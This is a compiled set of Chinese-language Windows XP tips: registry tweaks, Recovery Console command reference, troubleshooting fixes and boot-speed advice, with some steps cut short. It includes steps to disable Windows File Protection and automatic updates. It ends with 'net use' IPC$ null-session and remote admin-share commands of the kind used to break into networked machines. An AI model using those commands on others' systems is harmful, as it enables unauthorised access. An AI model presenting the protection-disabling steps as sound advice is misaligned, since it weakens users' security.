启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum,移除{20D04FE0-3AEA-1069-A2D8-08002B30309D}便可。 不显示“计算机关机”选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoClose”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 以Administrator身份登入系统,到“开始”-->“运行”,输入gpedit.msc,点选窗口左边的“计算机配置”-->“系统管理模板”-->“[开始]菜单和工作列”,启用“移除及停用[计算机关机]按钮”。 移除“搜索”选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoFind”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 移除“说明及支持“项目 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoSMHelp”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 移除“运行“选项 启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoRun”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 隐藏“回收站“ 方法:启动Regedit,到路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel,加入一个名为“{645FF040-5081-101B-9F08-00AA002F954E}”的DWORD值,将它设定为“1”。 修改“开始”menu显示 要修改 “开始”标题及menu显示,将要使用Resource Hacker来修改存放于C:\Windows资料夹内的Explorer.exe,由于这运行档受到Windows File Protection (WFP)功能保护,故必须先将其解除保护。 解除WFP保护方法:开启“档案总管”-->“Tools”à“Folder Options”-->“View”,取消 “Hide protected operating system files (recommend)”和“Hide extensions for known file types”,同时取消“Show hidden files and folders”。 然后到“开始”-->“运行”,输入“%systemroot%\system32\Restore”,应找到一个叫“filelist.xml”档案,点选再右按鼠标键选“内容 (Properties)”,取消“Read Only”一项。 开始正式修改filelist.xml,点鼠标右键,利用“记事本”开启档案,档案内容记录了所有受保护的重要档案。寻找“%windir%\system.ini”一行,加入“%systemroot%\explorer.exe”一行后存档。 到“开始”-->“运行”,输入“%systemroot%\system32\dllcache”,寻找并删除Explorer.exe,因为WFP功能一经运行后,系统会把某些指定的重要档案备份到这里。如果不把这档案删除,WFP功能运行例行检查时,发现Explorer曾经修改,便会实时将这个备份档取代刚修改的档案。 取消“自动更新”功能 Windows XP“自动更新”功能,自检发现有新的系统补丁便实时更新,虽然方便,但却占用一定的系统资源,倒不如自行手动更新更好,如果取消自动功能功能呢?方法如下: 到“控制台”-->“效能及维护”-->“系统”-->“自动更新”,选择“关闭自动更新,我要手动更新我的计算机”。另外,进入“开始”-->“运行”,运行msconfig在“服务”项目下取消“Automatic Updates”。 隐藏“网上邻居” Windows XP要隐藏“网上邻居”,启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoStartMenuNetworkPlaces”的DWORD值,若没有便新增一个,将设定值改为“1”便可。 找寻在“添加和删除程序”内隐藏的程序 不是所有已安装的程序都可透过“添加和删除程序”功能来反安装,但可通过修改一些参数来解决。例如Windows XP安装在C盘内,打开C:\Windows\inf资料夹,双击sysoc.inf文件,可看到有几行的倒数第二个单词是“Hide”。就是这个单词告诉系统不要把这个条目显示在“新增/移除程序”列表内,可使用空隔键来代替“Hide”便可显示所要的程序了 《DLL后门清除完全篇》
《XP控制台教程》Windows XP控制台教程 微软在Windows 2000和Windows XP中,提供了故障恢复控制台。它是微软推出的一种全新的控制模式,用于在安全模式和其他启动选项不起作用时修复系统。
故障恢复控制台的作用:可以启用或禁用服务、格式化驱动器、在本地驱动器上读写数据(包括被格式化为NTFS文件系统的驱动器)、重写硬盘的主引导记录(MBR)、重写分区引导记录、恢复启动菜单等等并执行许多其他管理的任务。如果需要通过从软盘或CD-ROM复制一个文件到硬盘来修复系统,故障恢复控制台将特别有用。 下面以大家用得比较多的Windows XP为例,一起看看怎么用它。 启动故障恢复控制台 方法有两个,一是从安装光盘启动,二是从硬盘启动。 插入Windows XP的安装光盘,并且在BIOS中设置为优先从CDROM启动,启动电脑以后,系统会自动进入Windows XP安装界面选项,按下“R”键选择第二项“要使用‘故障控制台’修复Windows XP安装,请按R。”系统自动登录到故障恢复控制台。 它会自动找到已经存在的系统及其安装目录并给予编号。此时提示,问你需要修复哪一个系统。这里只有一个,如果是多个,会把它们都显示出来的。 选择了要修复的系统的编号后,控制台会提示输入该系统的管理员密码。这个可千万不能忘记哦,否则将无法修复系统。 密码正确后,就真正进入了控制台,可以发号施令了。那么,不知道都有哪些可用的命令该怎么办呢? 答案是 HELP 命令。在控制台提示符下输入 HELP 回车。如图,可以看到控制台命令的第一页。看屏幕下方提示,按空格键后就可以显示下一页命令了。 但是知道了有啥命令,不会用怎么办呢? 答案仍然是 HELP 命令,只不过这次是在 HELP 命令后面跟上你想了解的命令就可以了。在此顺便讲几个比较常用的命令: FIXBOOT 命令的使用格式的帮助,该命令用来修复分区引导扇区。 另一个常用命令:FIXMBR ,可以修复硬盘主引导记录。 还有BOOTCFG ,这个命令相对于 Windows2000 来说,是 WindowsXP 独有的,它可以修复启动菜单。 比较有用的命令还有 format,对于用 DISKPART 命令建立的新分区,可以用它来格式化为 NTFS 和 FAT32 格式。所以不要把它和 Win98 下的 Format 命令等同。 diskpart 命令,可显示出分区信息,并对分区操作。需要指出的是,很多人把它称为 FDISK,这是不对的。尽管它和 FDISK 的功能差不多,但它的适应性比 FDISK 要强,功能也更方便。比如,不必特别地去激活主分区,默认就是激活的。也不必在删除主分区以后才可以删除扩展分区,可以直接对逻辑驱动器操作。它还有直接对 NTFS 分区操作的好处,而这对初学者来说尤其重要。等等。
第一部分:文件和目录操作命令 Attrib 更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、存档、隐藏以及压缩属性。 attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename] 参数 [ [ drive:] [ path] filename] 指定要处理的目录或文件的位置和名称。可以一次只更改一个文件,也可以更改整个目录。 注意:可以用一个命令更改一个文件或目录的多个属性。 Batch 执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故障恢复控制台可以从安装 CD 中启动。 batch input_file [ output_file] 参数 input_file :指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、目录名、文件名或它们的组合构成。 output_file :如果指定,则在命名文件中存储命令输出。如果没有指定,输出将显示在屏幕上。 范例 下例将执行批处理文件 C:\ Jobs\ Find.txt 并将输出存储在文件 C:\ Jobs\ Results.txt 中: batch c:\ jobs\ find.txt c:\ jobs\ results.txt 注意:批处理文件不能包含嵌套的 batch 命令。 Chdir (Cd) 显示当前目录的名称,或更改当前的文件夹。 含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chdir 命令。 chdir [drive:] [path] [ ..] 或者 cd [drive:] [ path] [ ..] 参数 无 如果不带任何参数,chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一起使用(例如 cd C:),chdir 将显示指定驱动器上的当前目录。 [ drive:] [ path] 指定要改到的驱动器(如果不是当前驱动器)和目录。 [ ..] 指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。 注意 · Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如: cd "driver cache" · Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。 Copy 将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制台时才可用。 可在命令提示符下使用带不同参数的 copy 命令。 copy source [ destination] 参数 source :指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文件名或组合所组成。 destination :指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器号和冒号、文件夹名、文件名及组合而组成。 注意 · 源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱动器的根目录、本地安装源或 Cmdcons 目录。 Delete (Del) 删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。 delete [ drive:] [ path] filename 或者 del [ drive:] [ path] filename 参数 [ drive:] [ path] filename指定要删除的文件的位置和名称。 注意 · Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。 Dir 显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。 dir [ drive:] [ path] [ filename] 参数 [ drive:] [ path] 指定要查看列表的驱动器和目录。 [ filename] 指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空格、逗号或分号隔开。可以在 filename 参数中使用通配符(?和 *)显示一组文件。 Dir 还列出磁盘的卷标和序列号,以及所列文件的数目,累计大小和磁盘上剩余的可用空间(以字节计)。对于每个文件和子目录而言,dir 列出文件的扩展名、文件字节数、文件的最后修改日期和时间以及下列文件属性(如果可用): 缩写 属性 注意: Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。 Expand 从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序文件。 含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 expand 命令。 expand source [ /F:filespec}] [ destination] [ /d] [ /y] 参数 source :指定要展开的文件。如果源文件只包含一个文件,请使用该选项。source 可由驱动器号和冒号、目录名、文件名或组合所组成。不能使用通配符。 /f:size :如果源文件包含多个文件,指定要提取的文件的名称。可以对要提取的文件使用通配符。 destination :指定提取文件或每个单独文件的目标目录和(或)文件名。 /d :列出 CAB 文件中包含的文件而不展开或提取。 /y :在展开或提取文件时不出现覆盖提示。 范例 下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到C:\ Windows\ System\ Drivers: expand d:\ i386\ driver.cab \ f:msgame.sys c:\ windows\ system\ drivers 下例将展开压缩文件 Access.cp_: expand d:\ i386\ acces.cp_c:\ windows\ system32\ access.cpl 下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。 expand /d d:\ i386\ driver.cab 要点 · 驱动程序 CAB 文件包含成千上万的文件,其中包括由 Windows 提供的大部分驱动程序。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议 仅从该文件中提取需要的文件。 Mkdir (md) 创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mkdir 命令。 mkdir [ drive:] path 或者 md [ drive:] path 参数 drive: :指定要创建新目录的驱动器。 path :指定新目录的名称和位置。不能使用通配符。 注意 · Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。 Rename (Ren) 更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 rename 命令。 rename [ drive:] [ path] filename1 filename2 或者 ren [ drive:] [ path] filename1 filename2 参数 [ drive:] [ path] filename1 指定要重新命名的文件的位置和名称。不能使用通配符。 filename2 为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。 Rmdir (Rd) 删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mdir 命令。 rmdir [ drive:] path 或者 rd [ drive:] path 参数 [ drive:] path 指定要删除的目录的位置和名称。不能使用通配符。 注意 · 目录必须为空否则命令失败。 Type 显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 type命令。 type [ drive:] [ path] filename 或者 more [ drive:] [ path] filename 参数 [ drive:] path] filename 指定要查看的文件的位置和名称。如果使用 NTFS 驱动器而且文件名包含空格,则必须用引号 (")将文件名引起来。 More 显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 more命令。 more [ drive:] [ path] filename 或者 type [ drive:] [ path] filename 参数 [ drive:] path] filename 指定要查看的文件的位置和名称。 如果使用 NTFS 驱动器,而且文件名包含空格,则必须用引号 (")将文件名引起来。 第二部分:系统和磁盘操作命令 Bootcfg bootcfg 命令启动配置和故障恢复(对于大多数计算机,即 boot.ini 文件)。 含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。 用法: bootcfg /default 设置默认引导项。 bootcfg /add 向引导列表中添加 Windows 安装。 bootcfg /rebuild 重复全部 Windows 安装过程并允许用户选择要添加的内容。 注意:使用 bootcfg /rebuild 之前,应先通过 bootcfg /copy 命令备份 boot.ini 文件。 bootcfg /scan 扫描用于 Windows 安装的所有磁盘并显示结果。 注意:这些结果被静态存储,并用于本次会话。如果在本次会话期间磁盘配置发生变化,为获得更新的扫描,必须先重新启动计算机,然后再次扫描磁盘。 bootcfg /list 列出引导列表中已有的条目。 bootcfg /disableredirect 在启动引导程序中禁用重定向。 bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings] 在启动引导程序中通过指定配置启用重定向。 范例: bootcfg /redirect com1 115200 hkdsk 创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。 含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。 vol [drive:] [ chkdsk [drive:] [/p] [/r] 参数 无 如果不带任何参数,chkdsk 将显示当前驱动器中的磁盘状态。 drive: 指定要 chkdsk 检查的驱动器。 注意 · Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录(默认为\ %systemroot%\ System32)中找到该文件,将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机,必须保证是在包含 Windows 的驱动器上使用该命令。 Diskpart 创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。 diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size] 参数 无 如果不带任何参数,diskpart 命令将启动 diskpart 的 Windows 字符模式版本。 /add :创建新的分区。 /delete :删除现有分区。 device_name :要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如,设备名称: drive_name :以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例: partition_name 以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例: \ Device\ HardDisk0\ Partition1 大小 要创建的分区大小,以兆字节 (MB)表示。仅与 /add 同时使用。 范例 下例将删除分区: diskpart /delete \ Device\ HardDisk0\ Partition3 下例将在硬盘上添加一个 20 MB 的分区: diskpart /add \ Device\ HardDisk0 20 Fixboot 向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时,才能使用 fixboot 命令。 fixboot [drive] 参数 驱动器 将要写入引导扇区的驱动器。它将替代默认的驱动器(即用户登录的系统分区)。例如,驱动器:D: 范例 下列命令范例向驱动器 D:的系统分区写入新的分区引导扇区: fixboot d: 注意: 如果不带任何参数,fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。 Fixmbr 修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。 fixmbr [ device_name] 参数 device_name 要写入新的主引导记录的设备(驱动器)。设备名称可从 map 命令的输出获得。例如,设备名称: \ Device\ HardDisk0 范例 下列命令示例向指定设备写入一个新的主引导记录: fixmbr \ Device\ HardDisk0 注意 · 如果不指定 device_name,新的主引导记录将被写入引导设备,即装载主系统的驱动器。
将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。 format [ drive:] [ /fs:file-system] 参数 drive: :指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。 /q :对驱动器进行快速格式化。不扫描驱动器看是否有坏区域,因此只应对以前格式化过的驱动器使用该参数。 /fs:file-system :指定要使用的文件系统:FAT 、FAT32 或 NTFS 。如果未指定文件系统,将使用现有的文件系统格式。 Map 显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。 map 命令仅在使用故障恢复控制台时才可用。 Map [ arc] 参数 arc :指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例: multi(0)disk(0)rdisk(0)partition(1) 等价的设备名称是: \ Device\ HardDisk0\ Partition1 范例 下例将物理设备名映射为使用 ARC 设备名称的驱动器号: map arc 注意 · 如果不使用 arc 参数,则 map 命令显示设备名称。
Cls 清除屏幕。 清除后的屏幕只显示命令提示符和插入点。 Disable 禁用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。disable 命令仅在使用故障恢复控制台时才可用。 disable {service_name] |[ device_driver_name} 参数 service_name :要禁用的系统服务名称。 device_driver_name :要禁用的设备驱动程序名称。 范例 下例将禁用 Eventlog 服务: disable eventlog 注意 · disable 命令将指定的服务或驱动程序的启动类型设为 SERVICE_DISABLED 。 Enable 启用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。enable 命令仅在使用故障恢复控制台时才可用。 enable {service_name |device_driver_name}[ startup_type] 参数 service_name :要启用的系统服务的名称。 device_driver_name :要启用的设备驱动程序的名称。 startup_type :要为服务或设备驱动程序指派的启动类型。有效的启动类型包括: · SERVICE_BOOT_START · SERVICE_SYSTEM_START · SERVICE_AUTO_START · SERVICE_DEMAND_START 范例 下例将 Eventlog 服务的启动类型设为自动或 SERVICE_AUTO_START: enable eventlog service_auto_start 注意 · 如果不指派启动类型,enable 命令将列出在 service_name 中指定的服务或设备驱动程序的当前启动类型。 · 使用 enable 命令更改启动类型时,上次启动类型的名称将显示在屏幕上。应该记下该名称,以便在需要时将启动类型恢复为上次的设置。 Exit 关闭故障恢复控制台并重新启动计算机。exit 命令仅在使用“故障恢复控制台”时才可用。 exit 参数 无 Help 提供有关故障恢复控制台命令的联机信息。 help [ commandname] 参数 无 列出故障恢复控制台中提供的命令。 commandname 提供有关命令信息,包括命令使用的参数。 注意 · 有两种方法可以获得命令的联机帮助。可以指定 help 命令后的命令名称,或者可以在命令提示符中键入该命令名称和 /?。开关。例如,键入下列命令可以获得有关extract 命令的信息: help extract Listsvc 列出计算机上可以使用的服务和驱动程序。listsvc 命令仅在使用故障恢复控制台时才可用。 listsvc 参数 无 Logon 登录到 Windows 安装。logon 命令仅在使用故障恢复控制台时才可用。 logon 参数 无 注意 · logon 命令将列出所有检测到的 Windows 安装,需要安装的本地管理员密码才能登录。 · 如果 3 次登录尝试都失败,“故障恢复控制台”会退出并且计算机将重新启动。 Net use 将网络共享连接到驱动器号。含有下列参数的 net use 命令仅在使用故障恢复控制台时可用。在命令提示符下可以使用带不同参数的 net use 命令。 语法 net use [ \ \ ComputerName\ ShareName [ /user:[ DomainName\ ] UserName] password] |[ drive 参数 \ \ servername\ sharename 指定服务器和共享资源的名称。如果 computername 包含空白字符,则将计算机名从双反斜杠 (\ \ )到计算机名结尾用引号 (")括起来。计算机名长度可以是 1 到 15 个字符。 /user 指定建立连接的用户名。 域名 确认用户的凭据时所要使用的域名。 用户名 指定登录时使用的用户名。 密码 指定访问共享资源所需的密码。不输入密码,将给出要键入密码的提示。在密码提示行处键入密码时不显示密码。 /d 表示将不断开该连接。 Set 显示和设置“故障恢复控制台”的环境变量。set 命令是必须与安全模板一同使用的可选命令。 含有不同参数的 set 命令仅在使用故障故障恢复控制台时可用。可在命令提示符下使用带不同参数的 set 命令。 set [ variable=[ string] ] 参数 variable 指定需要设置或修改的变量。 “故障恢复控制台”支持以下环境变量: 变量 说明 AllowWildCards 允许某些命令(如 del 命令)支持通配符。 AllowAllPaths 允许访问系统上的所有文件和目录。 AllowRemovableMedia 允许文件复制到可移动媒体上,如软盘。 NoCopyPrompt 覆盖现有文件时不显示提示。 string 指定要与指定变量关联的字符串。 范例 下例允许在某些故障恢复控制台命令中使用通配符: set allowwildcards=true 指定要删除的目录的位置和名称。不能使用通配符。 注意 · 目录必须为空否则命令失败。 · Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。 Systemroot 将当前目录设置为用户登录到的 Windows 安装系统的 systemroot 文件夹。systemroot 命令仅在使用故障恢复控制台时可用。 systemroot 参数 无
系统文件无法打开故障解决方法 我们在使用Windows操作系统的过程中,因为一些故障或者病毒的原因,造成了系统的一些文件夹和应用程序无法打开,而这些都是我们在使用电脑过程中所必须的,所以很多时 无法打开“我的电脑”,“我的文档”等 解决方法:可能是Explorer程序出错了,通过下面的方法可以解决相关故障 一、打开记事本,将以下内容添加到记事本中,并保存为AAA.bat文件,然后打开,依次点确定即可(如还不可以请试下第二种方法); regsvr32 appwiz.cpl 二、如果以上还不能修复,请将下面内容复制到记事本中,并保存为yezi.reg文件 然后打开; Windows Registry Editor Version 5.00 文件夹无法打开 解决方法: 1、在资源浏览器或者我的电脑里面无法打开文件夹,双击鼠标不是打开文件夹而是进入了搜索界面可以修改注册表来恢复,进入注册表的HKEY_CLASSES_ROOT\Directory\shell,把find删除。还有一个方法就是点"文件夹"的"高级"选项里的"新建",在"操作"里输入"OpenNew",接着再在"用于执行操作的应用程序"里输入"Explorer %1"就行了。如果删除find,那不用配置。如果新建OpenNew,那还需把"Opennew"设为默认。 2、在"我的电脑"中,无论打开哪个盘中的文件夹,都会出现"查找"的对话框,但用鼠标右键点击文件夹后选择"打开"后又能进入运行控制面板,双击"文件夹选项",点击"文件类型"标签,在"已注册的文件类型"列表下找到"文件夹"并选中它,单击"高级"按钮,在出现的"编辑文件类型"对话框中,如果只有"find"一项,则在"操作"下点击"新建"按钮,在"新操作"对话框的操作下面输入"Open",在"用于执行操作的应用程序"下面填入"C:\Windows\Explorer.exe",然后点击"确定",选中建立的"Open",点击"设为默认值"按钮;如果已经有"Open",则直接选中它并设成默认值即可。 EFS加密文件夹无法打开怎么办 解决方法: EFS(Encrypting File System,加密文件系统)是从Windows 2000开始就提出的一种基于NTFS文件系统的核心文件加密技术,主要是用于保护本地数据。在使用EFS加密文件的同时,也产生了诸多麻烦,比如重装系统后无法打开EFS加密过的文件夹等等,那么我们该如何解密?现在让我们先来看看大家的讨论。 备份及导入密钥来解密 为了防止在重装系统后无法打开加密文件夹,我们可以通过下面的方法来备份及导入密钥:点击“开始→运行”,输入“certmgr.msc”,回车后打开证书管理器。展开“证书/个人/证书”,右键单击在右侧窗口中以用户名为名称的证书,在“所有任务”中选择“导出”打开证书导出向导。单击“下一步”之后选择“是,导出私钥”,单击“下一步”,选择默认导出文件格式,再单击“下一步”,输入保护密码和确认密码,单击“下一步”后指定文件名,最后单击“完成”即可。 这样在重装系统之后,右键单击导出的私钥文件,选择“安装PFX”之后就可以一步一步导入私钥。导入完成后,就可以顺利地打开EFS加密的文件夹。 软件的方法不可靠 在没有备份密钥的情况下,要对EFS解密几乎是不可能的,虽然网上流行很多种方法,但是可行性微乎其微,劝大家放弃。因为某些EFS使用的是公钥证书对文件加密,而且在Windows 2000/XP中,每一个用户都使用了惟一的SID(安全标志)。第一次加密文件夹时,系统会根据加密者的SID生成该用户的密钥,并且会将公钥和密钥分开保存。如果在重装系统之前没有对当前的密钥进行备份,那就意味着无论如何都不可能生成此前的用户密钥,而解密文件不仅需要公钥,还需要密码,所以也就根本不能打开此前EFS加密过的文件夹。 无法打开“添加/删除程序” 导致无法打开“添加/删除程序”的原因可能是动态链接库文件注册失效了,只要重新注册这些文件就可以了。 解决方法:在“开始→运行”中输入下列命令,并依次在弹出窗口中确认即可。 regsvr32 Appwiz.cpl D盘无法打开的问题
解 无法打开快捷方式 现在我双击快捷方式后,总是没有反应,请问如何解决? 其实,快捷方式和一般文件一样,都属于某种文件类型。如果快捷方式(*.lnk)所连接的程序丢失或错误,就会造成这类文件无法打开。解决的方法如下: 1、Windows 2000 、Windows XP : 运行“assoc .lnk=lnkfile”,然后重新启动即可。 2、Windows 98 : 下载lnkfile.reg。双击打开它,然后单击【确定】按钮,将该完整的注册表数据添加到当前系统的注册表中即可。 局域网无法打开 出现这种情况可能有两大类: (1)网络连接是正常的,所看到的也是即时的网络现状; (2). 所看到的只是一个假象,实际上网络连接不通。 解决方法:对于前一种情况,我们就要介绍一下,网上邻居用户访问本机共享资源的用户身份,访问权限。通常我们通过网上邻居访问其它计算机资源是以“guest(来宾)”账号进行的,这一方面是大多数读者所不了解的,因为在实际的访问中,根本没有体现这一点。这个guest用户访问是不需输入任何密码的,用户名也不用,由系统默认了(就是guest)。正因如此,如果真正能看到共享资源,而且网络连接正常,则很可能是本机上的guest账户不可用。此时打开相应系统的用户账户管理程序查看的“guest”账号是否正常打开,如果“guest”账号前面的小图标上有一个红*,那表明“guest”账号当前被禁用,单击右键打开即可。 至于如果网络连接根本不正常,却在网上邻居上看到了其他计算机上的共享资源,那就要涉及到在浏览服务原理介绍篇中所介绍的主浏览器缓存现象了,也有可能是在交换机上保留了主浏览器的浏览列表备份,虽然网络连接不正常,但由于在缓存中仍存有以前的浏览列表,所以仍看到了以前的共享资源。这主要出现在不正常退出系统情况下,如非正常关机、死机等。解决的办法当然就是重新检查网络连接和配置了,参见前面相关故障介绍。 注册表无法打开 解决方法:注册表是 Window 系统的中枢和心脏,它记录着操作系统中绝大多数的设置。在 Window 系统中有一个附带的注册表编辑工具,使用它可以很方便地访问和修改注册表,这就是Regedit。 然而,现在网上的恶意程序利用注册表修改了IE的主页后,它不仅仅修改了注册表,而且为了防止您使用注册表程序修改会禁止使用注册表,当执行这一命令时,系统会弹出一个对话框:“注册表编辑 已被管管理员禁用。”这时注册表工具已被锁定。 可以采用下面的两种方法来解决该问题: 一、用脚本解决该问题 让我们按以下步骤来解除锁定: 1、点击“开始”菜单,从“程序”->“附件”中找到“记事本”命令并执行它。 2、在记事本窗口中输入以下内容:REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 《计算机英文术语完全介绍》
提高Windows速度的八绝招大家都希望电脑一开机就可以立即进入Windows 系统而不用等待,但由于种种原因常常未能如愿,甚至一开机就死机的情况也时有发生。其实有些时候Windows 启动速度缓慢并不是它本身的问题,而是一些设备或软件造成的,看看下面拖慢系统启动的8个原因,再查一查你的电脑是不是也存在类似问题! 1.USB硬盘和扫描仪等设备 如果电脑安装了扫描仪等设备,或在启动时已经连接了USB硬盘,那么不妨试试先将它们断开,看看启动速度是不是有变化。一般来说,由于USB接口速度较慢,因此相应设备会对电脑启动速度有较明显的影响,应该尽量在启动后再连接USB设备。如果没有USB设备,那么建议直接在BIOS设置中将USB功能关闭。 提示:由于Windows 启动时会对各个驱动器(包括光驱)进行检测,因此如果光驱中放置了光盘,也会延长电脑的启动时间。 2.令人心烦的网卡 如果设置不当,网卡也会明显影响系统启动速度,如果你的电脑用不着网卡,那就直接将网卡拔掉,以免影响系统启动速度。 如果你的电脑连接在局域网内,安装好网卡驱动程序后,默认情况下系统会自动通过DHCP来获得IP地址,但大多数公司的局域网并没有DHCP服务器,因此如果用户设置成“自动获得IP地址”,系统在启动时就会不断在网络中搜索DHCP 服务器,直到获得IP 地址或超时,自然就影响了启动时间,因此局域网用户最好为自己的电脑指定固定IP地址。 3.文件和打印机共享 有些安装了Windows XP专业版的电脑也会出现启动非常慢的问题,甚至达到了1分40秒之多!系统似乎死机了,登录系统后,桌面也不出现,电脑就像停止反应,1分钟后才能正常使用。这是由于使用了Bootvis.exe 程序后,其中的Mrxsmb.dll文件为电脑启动添加了67秒的时间! 要解决这个问题,只要停止共享文件夹和打印机即可:选择“开始→设置→网络和拨号连接”,右击“本地连接”,选择“属性”,在打开的窗口中取消“此连接使用下列选定的组件”下的“Microsoft网络的文件和打印机共享”前的复选框,重启电脑即可。 提示:微软已经对Bootvis.exe文件进行了多次升级,而且它确实对Windows XP的启动速度有很大帮助,建议大家到http //www.microsoft.com/whdc/hwdev/platform/performance/fastboot/default.mspx 下载该工具。 4.断开不用的网络驱动器 为了消除或减少 Windows 必须重新建立的网络连接数目,建议将一些不需要使用的网络驱动器断开,也就是进入“我的电脑”,右击已经建立映射的网络驱动器,选择“断开”即可。 5.硬盘分区太多也有错 如果你的Windows 2000没有升级到SP3或SP4,并且定义了太多的分区,那么也会使启动变得很漫长,甚至挂起。所以建议升级最新的SP4,同时最好不要为硬盘分太多的区。因为Windows 在启动时必须装载每个分区,随着分区数量的增多,完成此操作的时间总量也会不断增长。 6.桌面图标太多会惹祸 桌面上有太多图标也会降低系统启动速度。Windows每次启动并显示桌面时,都需要逐个查找桌面快捷方式的图标并加载它们,图标越多,所花费的时间当然就越多。建议大家将不常用的桌面图标放到一个专门的文件夹中或者干脆删除! 提示:有些杀毒软件提供了系统启动扫描功能,这将会耗费非常多的时间,其实如果你已经打开了杀毒软件的实时监视功能,那么启动时扫描系统就显得有些多余,还是将这项功能禁止吧! 7.字体过多也拖后腿 尽管微软声称Windows可以安装1000~1500种字体,但实际上我们却发现当安装的字体超过500 种时,就会出现问题,比如:字体从应用程序的字体列表中消失以及Windows的启动速度大幅下降。在此建议最好将用不到或者不常用的字体删除,为避免删除后发生意外,可先进行必要的备份。 8.微软自己起“内讧” 还记得Windows XP的某个补丁造成系统启动变慢的新闻吧(比如:代号为 Q328310的补丁会造成Windows 2000/XP启动和关机速度奇慢,甚至有可能导致注册表锁死),可见微软自己内部出问题的可能性也不小,如果你在升级了某个系统补丁后,突然发现系统启动变慢,那么最好留意一下是不是补丁惹的祸。 ★ DOS命令字典收藏 ★【1】 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ 